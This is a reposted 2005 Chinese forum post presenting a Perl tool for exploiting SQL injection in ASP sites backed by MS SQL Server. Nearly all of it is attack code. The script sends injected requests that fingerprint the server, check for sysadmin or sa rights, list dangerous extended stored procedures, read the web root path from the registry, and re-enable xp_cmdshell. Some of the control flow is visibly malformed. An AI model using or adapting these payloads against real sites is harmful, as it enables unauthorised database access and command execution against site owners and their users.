[转载]get mssql injection more info.pl
本文作者:lanker文章出处:[url]www.cnwill.com[/url]
文章性质:原创
阅读次数:9
发布时间:2005-01-06
很久以前写的, 得知有注射后用可以得到很多基本信息,权限,扩展之类的还有绝对路径。
代码:
--------------------------------------------------------------------------------
#!/usr/bin/perl
#codz by lanker 2004/3/27
# Our Team :[url]www.cnwill.com[/url]|[url]www.nmsafe.net[/url]
#use get mssql injection more info
#thx ≯Super·Hei
$|=1;
use Socket;
print "=======================================================================\n";
print " Codz By lanker <nmlanker\@163.com> \n";
print " My blog:[url]http://www.hackblog.com/blog.asp?name=lanker[/url] \n";
print "=======================================================================\n";
my $ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 81 /qc/list.asp?unid=2 测试成功\n";
exit;
}
$host=$ARGV[0];
$port=$ARGV[1];
$path=$ARGV[2];
$flag=$ARGV[3];
$bug="$path%20and%201=(select%20\@\@version);--";
$req= make_request($bug);
@res=sendraw($req);
print "======================Getting OS Infomation==========================\n\n";
print "Find The OS Info:\n";
foreach $resline(@res) {
print $resline if $resline=~/\sWindows/isg;
}
$qx="$path%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));--";
$req= make_request($qx);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size > 0) {
print "Find IS_SRVROLEMEMBER : sysadmin\n";
}
else{
print "\aFind IS_SRVROLEMEMBER is not sysadmin\n";
}
$sa="$path%20and%20'sa'=(select%20system_user);--";
$req= make_request($sa);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Find The User is SA\n";
}
else{
print "\aFind The User isn't SA\n";
}
$exetend="$path%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20xtype%20=%20'X'%20AND%20name%20=%20'xp_cmdshell');--";
$addexetend="$path%20;EXEC%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll';--";
$table="$path;create%20table%20[dbo].[nmlk]%20([mnlk][char](255));--";
$wdata="$path;DECLARE%20\@result%20varchar(255)%20EXEC%20master.dbo.xp_regread%20'HKEY_LOCAL_MACHINE','SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual%20Roots',%20'/',%20\@result%20output%20insert%20into%20nmlk%20(mnlk)%20values(\@result);--";
$rpath="$path%20and%201=(select%20count(*)%20from%20nmlk%20where%20mnlk%20>%201);--";
$deltable="$path;drop%20table%20nmlk;--";
print "\n===================Getting The Stored Procedures=====================\n\n";
@exentend=('xp_regread','sp_makewebtask','xp_cmdshell','xp_regwrite','xp_regdeletevalue','xp_regdeletekey','xp_loginconfig','xp_logininfo','xp_msver','xp_enumdsn','xo_enumgroups','xp_servicecontrol','xp_terminate_process');
foreach $exent(@exentend) {
$rqexent="$path%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20name%20=%20'$exent');--";
$req= make_request($rqexent);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "YeYe!!Find:$exent\n";
push @ex,$exent;
}
}
if ($ex[0] eq 'xp_regread' && $ex[1] eq 'sp_makewebtask'){
print "\n=======================Getting The Web Path Now======================\n\n";
sleep(2);
$req= make_request($table);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size > 0) {
print "Create Table ... Ok!!\n";
sleep(1);
$req= make_request($wdata);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size > 0) {
print "Write The Data ... Ok!!\n";
sleep(1);
$req= make_request($rpath);
@res=sendraw($req);
print "Get The WEB Path:";
foreach $tmpline (@res) {
if($tmpline=~/char 值.*转换/isg) {
($s1,$s2,$s3)=split(/'/,$tmpline);
$s2=~s/ //isg;
($ss1,$ss2,$ss3)=split(",",$s2);
print "$ss1\n";
}
}
sleep(1);
$req= make_request($deltable);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Drop The Temp Table ... Ok!!\n";
}
else {
print "Drop The Temp Table ... Faile!!\n";
exit;
}
}
else {
print "Write The Data ... Faile!!\n";
exit;
}
}
else {
print "Getting The WEB Path ... Faile!!\n";
exit;
}
else {
print "Can't acquire the path!\n";
}
if ($ex[2] ne 'xp_cmdshell') {
print "Test Used xplog70.dll Return xp_cmdshell ....";
sleep(3);
$req= make_request($addexetend);
@res=sendraw($req);
$req= make_request($exetend);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Succeevd !!\n";
push @ex,$exent;
}
else{
print "Faile !!\n";
}
}
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
sub make_request
{
my $getstr=shift;
my $reqstr;
$reqstr= "POST $getstr HTTP/1.0\r\n".
"HOST:$host\r\n\r\n";
return $reqstr;
}
页:
[1]